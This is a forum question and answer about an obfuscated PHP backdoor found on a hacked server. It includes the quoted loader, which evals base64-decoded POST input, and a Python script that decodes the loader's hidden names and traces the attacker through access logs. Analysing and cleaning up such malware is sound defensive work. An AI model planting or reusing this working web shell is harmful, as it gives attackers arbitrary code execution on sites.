php - Trying to decode a virus


My server was attacked, and I've been trying to research how and why it is happening.

I have found a similar pattern in the virus files, which looks like this. As far as I can tell it's trying to run a specific file?

Has anyone seen this, and how should I interpret it? Is it grabbing individual characters based on the $sf string?

<?php  $sf = "pct4ba6odse_"; $s21 = strtolower($sf[4] . $sf[5] . $sf[9] . $sf[10] . $sf[6] . $sf[3] . $sf[11] . $sf[8] . $sf[10] . $sf[1] . $sf[7] . $sf[8] . $sf[10]); $s22 = ${strtoupper($sf[11] . $sf[0] . $sf[7] . $sf[9] . $sf[2])}['nd335c3']; if (isset($s22)) {   eval($s21($s22)); }?> 

The variable $s21 is equal to base64_decode, and $s22 is equal to $_POST['nd335c3'].

Whenever a POST request is made to the server, it executes whatever command is in $_POST['nd335c3']; as you can expect, this is dangerous.

I highly doubt the server was hacked; instead a website script was exploited. Is there anywhere on the site that users can upload files? I've seen a lot of stuff like this in poorly coded WordPress plugins.

Fixing the problem

To fix the problem, first delete the file or the section of code. You may want to shut down the site and put it in maintenance mode until you can search through and verify that other files have not been modified.

Once the site is up and running, log requests made to where the hacked file was located, or requests that contain the same POST variable.

Once you have the user who sends data to the exploit, you can check the other log files and compare them for the same IP address and user agent. It's a far shot that they used only one computer for the attack, but in the logs you can see what they visited to possibly execute the attack and upload the exploited file.

Preventing it in the future

  1. Don't install code you find online onto your site unless you trust the developer, believe it's secure, and know they release updates.
  2. Set the web server to not have write access anywhere besides the upload directory and /tmp.
  3. Verify uploaded files to make sure they are what you expect them to be.
  4. Don't allow PHP to run files in the directory they are uploaded to; have those files served as static direct downloads. That way, if a file has been uploaded that bypasses the file checks, it still can't do harm.
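As an added example (not code from the question or the answer), the following Python script does two things the answer describes: it reassembles the names the loader builds from $sf one character at a time, so the snippet can be triaged without executing any PHP, and it filters an access log for POSTs to the dropped file and then pulls every request from the same IP and User-Agent pairs. The combined log format is assumed, and the log lines, the sf.php path and the plugin upload path are constructed for the example.

```python
import re

# Seed and index lists copied from the loader in the question: the function and
# superglobal names are spelled out one character at a time from $sf.
SEED = "pct4ba6odse_"
FUNC_IDX = [4, 5, 9, 10, 6, 3, 11, 8, 10, 1, 7, 8, 10]  # builds $s21
SUPERGLOBAL_IDX = [11, 0, 7, 9, 2]                         # builds the name used for $s22

def rebuild(seed, idx):
    """Reassemble the string that $sf[i] . $sf[j] ... produces, without running PHP."""
    return "".join(seed[i] for i in idx)

# Apache/nginx combined log format (assumed); the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) '
    r'[^"]*" (?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def related_activity(lines, shell_path):
    """Find POSTs to the dropped file, then return every request from the same
    IP + User-Agent pairs so the earlier upload/exploit step can be located."""
    entries = [e for e in map(parse, lines) if e]
    actors = {(e["ip"], e["ua"]) for e in entries
              if e["method"] == "POST" and e["path"].split("?")[0] == shell_path}
    return [e for e in entries if (e["ip"], e["ua"]) in actors]

SAMPLE_LOG = [  # constructed for this example; paths are hypothetical
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11)"',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-content/plugins/foo/upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0 (X11)"',
    '198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Macintosh)"',
    '203.0.113.5 - - [10/Oct/2023:13:57:22 +0000] "POST /wp-content/uploads/sf.php HTTP/1.1" 200 17 "-" "Mozilla/5.0 (X11)"',
]

if __name__ == "__main__":
    # Prints the two hidden names, then the attacker's full request trail.
    print(rebuild(SEED, FUNC_IDX).lower(), rebuild(SEED, SUPERGLOBAL_IDX).upper())
    for e in related_activity(SAMPLE_LOG, "/wp-content/uploads/sf.php"):
        print(e["ts"], e["method"], e["path"])
```

Note that the POST body (and so the nd335c3 parameter) is not in a standard access log; matching on the file path is what the log alone supports, and the body would need request logging on the web server or application side.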
